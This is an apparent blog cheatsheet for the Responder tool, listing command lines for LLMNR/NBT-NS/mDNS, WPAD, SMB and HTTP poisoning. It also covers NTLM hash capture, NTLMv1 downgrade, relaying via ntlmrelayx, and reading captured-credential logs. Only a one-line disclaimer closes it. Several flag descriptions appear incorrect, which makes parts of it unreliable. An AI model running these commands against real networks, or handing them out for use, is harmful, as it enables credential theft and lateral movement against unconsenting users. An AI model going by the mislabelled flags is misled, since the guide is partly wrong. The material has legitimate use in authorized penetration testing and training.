Responder tool running in Kali Linux for network spoofing

Responder Cheatsheet

The Ultimate LLMNR/NBT-NS/MDNS Poisoning & Credential Capture Guide

Basic Responder Usage

Start Responder
responder -I eth0
Start Responder on interface eth0.
List Available Interfaces
responder --list-interfaces
Show all available network interfaces.
Basic Poisoning
responder -I eth0 -wrf
Enable WPAD, HTTP, and FTP poisoning.
Disable HTTP Server
responder -I eth0 --disable-http
Run Responder without HTTP server.
Disable SMB Server
responder -I eth0 --disable-smb
Run Responder without SMB server.
Set Custom WPAD Proxy
responder -I eth0 --wpad --proxy="http://attacker:8080"
Set a custom WPAD proxy URL.

Poisoning Attacks

LLMNR/NBT-NS Poisoning
responder -I eth0 -v
Basic poisoning with verbose output.
Force WPAD Auth
responder -I eth0 -w
Enable WPAD authentication.
FTP Poisoning
responder -I eth0 -f
Enable FTP poisoning.
SMB Poisoning
responder -I eth0 -s
Enable SMB poisoning.
HTTP Poisoning
responder -I eth0 -r
Enable HTTP poisoning.
DNS Poisoning
responder -I eth0 -d
Enable DNS poisoning.
LDAP Poisoning
responder -I eth0 -l
Enable LDAP poisoning.

Credential Capture

Capture NTLMv1/NTLMv2
responder -I eth0 -v
Captures NTLM hashes from SMB/HTTP.
Basic Auth Capture
responder -I eth0 -r -b
Capture Basic Auth credentials.
Downgrade to NTLMv1
responder -I eth0 --lm
Force NTLMv1 downgrade (weaker).
Analyze Captured Hashes
cat /usr/share/responder/logs/*.txt
View captured credentials.
Relay to Another Host
ntlmrelayx.py -tf targets.txt -smb2support
Use with Impacket for SMB relay.

Advanced Attacks

Multi-Host Poisoning
responder -I eth0 -A 192.168.1.10,192.168.1.20
Only respond to specific hosts.
Silent Mode
responder -I eth0 -q
Run without printing to console.
IPv6 Poisoning
responder -I eth0 -6
Enable IPv6 poisoning.
Fingerprint Hosts
responder -I eth0 --analyze
Analyze network hosts.

Logs & Output

View Logs Directory
ls /usr/share/responder/logs/
List captured credential files.
View HTTP Logs
cat /usr/share/responder/logs/HTTP-NTLMv2-*.txt
View captured HTTP hashes.
View SMB Logs
cat /usr/share/responder/logs/SMB-NTLMv2-*.txt
View captured SMB hashes.
View WPAD Logs
cat /usr/share/responder/logs/HTTP-*-WPAD.txt
View WPAD proxy requests.

⚠️ Warning: Use Responder responsibly and only on authorized networks. Unauthorized use may violate laws.

Avatar photo

I'm passionate about technology, coding. I've been interested in computers since I was a kid. My favorite programming languages are python and JavaScript

Similar Posts

Leave a Reply